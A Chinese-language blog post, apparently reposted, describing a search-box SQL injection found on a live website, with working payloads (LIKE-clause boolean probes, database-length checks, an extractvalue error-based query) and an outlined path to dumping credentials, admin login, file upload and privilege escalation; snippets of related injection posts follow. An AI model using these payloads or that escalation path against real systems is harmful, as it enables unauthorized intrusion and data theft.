記一次搜尋型注入

2021-10-02 01:52:13 字數 1339 閱讀 4464

1.起因

還是和往常一樣,看見index.php?id=1這樣的介面順手就想來個and 1=1 ,結果沒反應,試試其他的大小寫 內聯注釋 多次編碼注入均失敗,我望著頁面的無效引數陷入了深思,難道這個**真的沒有一絲可以利用的地方,我告訴自己不可能,肯定是自己能力不夠還不足以發現頁面的漏洞,既然sql不行那就找找xss csrf等漏洞,皇天不負有心人,在搜尋框輸入">

寫完回到這裡想想,搜尋框怎麼能xss呢,自己真傻

2.確定注入

剛開始在搜尋框輸入">

以前沒接觸過搜尋型注入,去找了下資料

1.搜尋keywords『,如果出錯的話,有90%的可能性存在漏洞;

2. 搜尋 keywords%,如果同樣出錯的話,就有95%的可能性存在漏洞;

3. 搜尋keywords% 'and 1=1 and '%'='(這個語句的功能就相當於普通sql注入的 and 1=1)看返回的情況

4. 搜尋keywords% 'and 1=2 and '%'='(這個語句的功能就相當於普通sql注入的 and 1=2)看返回的情況

還有其他語法

'and 1=1 and '%'='

%' and 1=1--'

%' and 1=1 and '%'='

輸入'%看看

二分判斷資料庫長度2016%'and length(database())>5 and '%'='

輸入2016%'and left(database(),1)>'a' and '%'='判斷資料庫第一位 ,一位一位判斷也可以但是因為頁面明顯能看到報錯,所以選擇報錯注入,直接輸入2016%' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '%'=',其實這些構造語句都是在'and 1=1 and '%'=的基礎上擴充套件的,其它語句和普通sql注入的語句沒有什麼區別

既然如此,那是不是可以爆其他敏感資料了。到此為止不做深入,但是思路得有,下一步找到賬號密碼就可以掃瞄子網域名稱敏感目錄啥的進後台登入了,登入上去肯定就可以上傳檔案修改東西,完了就提權或者橫向滲透什麼的。

3.小結

遇見乙個**或者專案不要放棄,只要肯努力肯定能找到漏洞所在。不要太過分,點到為止即可!

記一次sql二次注入

簡單的說,二次注入是指已儲存 資料庫 檔案 的使用者輸入被讀取後再次進入到 sql 查詢語句中導致的注入。相比於直接注入,二次注入是比較有趣的。因為他會把你第一次的請求儲存,然後在第二次使用到的時候,才會啟用並且返回結果。例如在某個插入功能中,我們插入構造的sql語句,此時並沒有什麼現象,但是當瀏覽...

記一次操蛋的mysql注入之旅

最近開始學習web安全的知識,剛好學完mysql注入這塊,趕緊找個 練練手,整個過程很順利,但是結果很操蛋。我還是個小菜鳥,各位大神看了輕噴.站點 馬賽克遮體 1.注入點檢測 and 1 1 結果正常 and 1 2 結果為空 勤奮的孩子運氣不會差,一出手就發現了注入點,下面就開始一步步開搞。2.猜...

記一次DVWA的SQL注入測試

sql注入擷取函式 mid column name,start length 第乙個引數為要處理的字串,start為開始位置,length為擷取的長度。substr string,start,length 第乙個引數為要處理的字串,start為開始位置,length為擷取的長度。left strin...